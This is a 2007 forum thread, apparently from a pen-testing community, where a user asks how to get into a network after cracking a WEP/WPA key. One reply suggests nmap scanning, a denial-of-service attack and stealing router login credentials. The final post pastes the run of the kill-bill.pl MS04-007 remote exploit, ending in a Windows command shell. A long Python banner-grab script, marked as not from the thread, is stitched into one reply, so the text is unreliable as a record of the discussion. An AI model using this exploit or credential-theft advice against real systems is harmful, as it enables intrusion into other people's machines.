whats next......


pureh@te
04-29-2007, 06:34 AM
Sorry for the new thread guys, I almost feel like I'm spamming the forums, but I'm interested in what to do next after obtaining the WEP/WPA key. I know a lot of people just want to steal their neighbors' wireless or get free internet at a hotel, but I am really interested in pen testing, and being new to Linux I could use some help. I'm doing plenty of research too, but I was hoping some tutorials were coming about what to do next. For example, how can I access an AP after I obtain the key? More importantly, how can I connect by exploiting a port? My router is firewalled and password-protected, and for some reason it is inaccessible by wireless but it is by ethernet? Don't know why. I'm interested now in wirelessly accessing ports to gain control of a network. Just a nudge towards the right set of tools would help. I'm just trying to get the most out of BT because only using it for WEP cracking seems like using a Ferrari for a closet. Thanks

ghaze
04-29-2007, 03:02 PM
I would hope most of the people here are interested in more than ripping off their neighbor's wireless. I hope this is your own router you are trying to exploit. Possibly if you rephrase your question... :D

nmap -v -A <router ip>

The above command will show you what common ports are open on your router and possibly what kind of router it is.

You could google for the type of router plus exploit.

You could possibly create a denial of service and steal the login credentials with a **** attack when the owner logs in to see what's going on.

Stealing your neighbor's bandwidth can have unexpected results. An email "from you" to everyone in your address book concerning your new sexual orientation comes to mind.:D

Have Fun

pureh@te
04-29-2007, 03:33 PM
Of course it's my own router and I know how to use nmap. My router is only open on 80 and 443, both HTTP ports as far as I can figure. The problem is I can't access the login screen wirelessly, but I can from one of the hardwired PCs on my network. I guess I'm looking for the workaround for that, i.e. connecting to a router port wirelessly {through a firewall} in order to access the network. I realize this is a tall order but some help in the right direction would help.......... such as I'm now reading up and studying Metasploit, but some of the types of exploits are way over my head. Maybe if you guys know another forum or site I have not yet visited. Thanks, :D

theprez98
04-29-2007, 07:35 PM
Of course it's my own router and I know how to use nmap. My router is only open on 80 and 443, both HTTP ports as far as I can figure. The problem is I can't access the login screen wirelessly, but I can from one of the hardwired PCs on my network. I guess I'm looking for the workaround for that, i.e. connecting to a router port wirelessly {through a firewall} in order to access the network. I realize this is a tall order but some help in the right direction would help.......... such as I'm now reading up and studying Metasploit, but some of the types of exploits are way over my head. Maybe if you guys know another forum or site I have not yet visited. Thanks, :D
One vector of attack would be if someone connected to port 80, they could do a banner grab and find out what version of IIS/Apache you're running, and if it has any associated exploits.
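As an added example (not code from the thread or from any poster), here is a small Python script that shows what a banner grab on port 80 actually collects and lets you check whether your own router's web interface discloses a product version in its Server header. The parse_banner function works on constructed sample responses so it runs offline; grab_banner sends a single HEAD request to a host you administer. The sample responses and the version-token regex are assumptions made for the example, not captured from any real device.

```python
"""Check what a web server reveals in its HTTP banner.

Added example, not part of the original thread. parse_banner() extracts
the status line and Server header from a raw HTTP response and reports
whether the header discloses a product version (e.g. "Apache/2.2.3"),
which is the information a banner grab yields. grab_banner() performs
one HEAD request against a host you own and feeds the reply to the parser.
"""
import re
import socket
from typing import NamedTuple, Optional


class BannerReport(NamedTuple):
    status_line: str
    server: Optional[str]
    version_disclosed: bool


# Assumption for this example: a version-bearing product token looks like
# "name/1.2.3" (Apache/2.2.3, nginx/1.18.0, lighttpd/1.4.35, ...).
_VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)*")


def parse_banner(raw: bytes) -> BannerReport:
    """Parse the status line and Server header out of a raw HTTP response."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1", errors="replace").split("\r\n")
    status_line = lines[0] if lines else ""
    server = None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            server = value.strip()
            break
    disclosed = bool(server and _VERSION_RE.search(server))
    return BannerReport(status_line, server, disclosed)


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> BannerReport:
    """Send a HEAD request to a host you administer and parse its reply."""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
            if b"\r\n\r\n" in b"".join(chunks):  # headers complete
                break
    return parse_banner(b"".join(chunks))


# Constructed sample responses (not captured from any real router).
SAMPLE_VERBOSE = (b"HTTP/1.1 401 Unauthorized\r\n"
                  b"Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3\r\n"
                  b"WWW-Authenticate: Basic realm=\"router\"\r\n\r\n")
SAMPLE_QUIET = b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Length: 0\r\n\r\n"
SAMPLE_NONE = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"


if __name__ == "__main__":
    # Offline demonstration on the constructed samples.
    for sample in (SAMPLE_VERBOSE, SAMPLE_QUIET, SAMPLE_NONE):
        print(parse_banner(sample))
    # Live check against your own device, e.g.:
    # print(grab_banner("192.168.0.1"))
```

If your router answers like SAMPLE_VERBOSE, the exact server build is public to anyone who can reach port 80, which is what the "banner grab, then look for associated exploits" step above relies on; a response like SAMPLE_QUIET or SAMPLE_NONE gives that step nothing to work with, so trimming or removing the Server header on an administrative interface you control is a cheap hardening measure.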

pureh@te
04-30-2007, 03:52 AM
$ ./kill-bill.pl
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

Usage: kill-bill -p <port> -s <service> host

Services:
iis IIS HTTP server (port 80)
iis-ssl IIS HTTP server with SSL (port 443)
exchange Microsoft Exchange SMTP server (port 25)
smb-nbt SMB over NetBIOS (port 139)
smb SMB (port 445)

If a service is running on its default port you don't have to
specify both the service and the port.

Examples: kill-bill -s iis 192.168.0.1
kill-bill -p 80 192.168.0.1
kill-bill -p 1234 -s smb 192.168.0.1

$ ./kill-bill.pl -s smb 192.168.0.1
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

. Loading shellcode
. Generating SPNEGO token
SPNEGO token is 4222 bytes long.
. Exploiting SMB server at 192.168.0.1:445
Sending Negotiate Protocol Request
Sending Session Setup AndX request (4287) bytes
. Attempting to connect to shell on port 8721

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


This comes with some exploit instructions. Anyone know it?